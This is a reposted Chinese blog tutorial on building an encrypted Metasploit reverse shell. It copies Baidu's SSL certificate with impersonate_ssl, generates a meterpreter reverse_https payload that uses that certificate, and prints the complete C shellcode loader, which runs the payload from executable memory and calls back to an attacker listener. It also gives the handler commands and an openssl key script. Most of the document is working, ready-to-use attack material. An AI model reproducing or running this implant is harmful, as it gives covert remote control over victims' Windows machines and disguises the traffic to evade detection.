标签：Metasploit x68 x31 加密 x53 xff x8b SSL x00

1.下载证书。Impersonate_SSL模块，下载指定网站的证书。

msf6> use auxiliary/gather/impersonate_ssl
msf6 auxiliary(gather/impersonate_ssl) > set rhost  www.baidu.com
msf6 auxiliary(gather/impersonate_ssl) > run

得到：/root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem

2.生成带有ssl证书的shellcode代码。

msf auxiliary(impersonate_ssl) > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set STAGERVERIFYSSLCERT true
msf payload(reverse_https) > set HANDLERSSLCERT /root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem
msf payload(reverse_https) > set LHOST 192.168.140.128
msf payload(reverse_https) > set LPORT 8443
msf6 payload > generate -f c -o /root/shell.c

3.打开生成文件，然后加入到shellcode执行盒中。

#include <Windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")

unsigned char buf[] = 
"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x8b\x52\x10\x57\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x8b\x58\x20\x50\x01\xd3"
"\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34\x8b\x01\xd6\x31\xc0\xac"
"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26"
"\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\xe8\x3e\x00\x00\x00"
"\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69"
"\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54"
"\x72\x69\x64\x65\x6e\x74\x2f\x37\x2e\x30\x3b\x20\x72\x76\x3a"
"\x31\x31\x2e\x30\x29\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b"
"\x6f\x00\x68\x3a\x56\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53"
"\x68\xfb\x20\x00\x00\xe8\x6a\x01\x00\x00\x2f\x72\x6a\x5f\x79"
"\x6d\x73\x34\x4b\x4f\x74\x6d\x72\x59\x61\x70\x67\x79\x37\x73"
"\x50\x52\x41\x4f\x65\x44\x6d\x76\x68\x35\x64\x4d\x46\x5f\x32"
"\x34\x6b\x44\x5a\x6d\x79\x43\x65\x69\x32\x33\x55\x75\x66\x58"
"\x68\x55\x41\x33\x54\x62\x43\x32\x6a\x70\x5a\x43\x49\x5f\x64"
"\x47\x65\x32\x70\x54\x69\x5a\x63\x79\x76\x68\x53\x6a\x5f\x37"
"\x51\x58\x5f\x73\x68\x33\x62\x67\x44\x36\x6a\x66\x69\x32\x46"
"\x55\x63\x4a\x65\x6a\x70\x4d\x74\x56\x53\x51\x67\x6f\x30\x67"
"\x48\x4a\x46\x4a\x6c\x36\x54\x52\x33\x78\x55\x6c\x6f\x44\x70"
"\x62\x36\x5a\x31\x68\x34\x32\x4a\x37\x6d\x35\x50\x5f\x54\x79"
"\x67\x44\x4d\x41\x4f\x71\x6e\x65\x52\x48\x39\x35\x53\x5a\x4c"
"\x54\x66\x57\x58\x74\x45\x4a\x38\x75\x6d\x2d\x4e\x55\x62\x6f"
"\x78\x66\x59\x58\x55\x34\x46\x76\x62\x48\x59\x35\x30\x6c\x6b"
"\x4f\x67\x48\x42\x43\x39\x4a\x4b\x41\x75\x38\x41\x6c\x37\x69"
"\x39\x51\x76\x4e\x30\x65\x6d\x37\x54\x70\x43\x5a\x65\x6b\x4b"
"\x72\x4b\x4f\x00\x50\x68\x57\x89\x9f\xc6\xff\xd5\x89\xc6\x53"
"\x68\x00\x32\xe8\x84\x53\x53\x53\x57\x53\x56\x68\xeb\x55\x2e"
"\x3b\xff\xd5\x96\x6a\x0a\x5f\x68\x80\x33\x00\x00\x89\xe0\x6a"
"\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x53\x53\x53"
"\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x14\x68\x88"
"\x13\x00\x00\x68\x44\xf0\x35\xe0\xff\xd5\x4f\x75\xcd\xe8\x4c"
"\x00\x00\x00\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00"
"\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68"
"\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0"
"\x74\xcf\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\x5f\xe8\x6b"
"\xff\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x34\x30\x2e"
"\x31\x32\x38\x00\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
typedef void(__stdcall* CODE) ();

int main()
{
    //((void(*)(void))&buf)();
    PVOID pFunction = NULL;
    pFunction = VirtualAlloc(0, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(pFunction, buf, sizeof(buf));
    CODE StartShell = (CODE)pFunction;
    StartShell();
}

4.建立侦听

use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set HANDLERSSLCERT  /root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem
msf exploit(handler) > set STAGERVERIFYSSLCERT true
msf exploit(handler) > set LPORT 8443
msf exploit(handler) > set LHOST 192.168.140.128
msf exploit(handler) > run -j

确保网站可以打开。

运行后即可上线。

如果需要自己制作证书，则可以使用，脚本生成。

#!/bin/bash
clear
read -p "Password:" PASS
echo "创建AES256加密密钥..."
openssl genrsa -passout pass:${PASS} -out rsa_aes_private.pem 2048
echo "生成公钥..."
openssl rsa -in rsa_aes_private.pem -passin pass:${PASS} -pubout -out rsa_public.pem
echo "PEM私钥转DER..."
openssl rsa -in rsa_aes_private.pem -passin pass:${PASS} -out rsa_private_key.der -outform der 
echo "PEM公钥转DER..."
openssl rsa -in rsa_public.pem -out rsa_public_key.der -pubin -outform der 
echo "Finish!"

标签：Metasploit,x68,x31,加密,x53,xff,x8b,SSL,x00
来源： https://www.cnblogs.com/LyShark/p/14949496.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。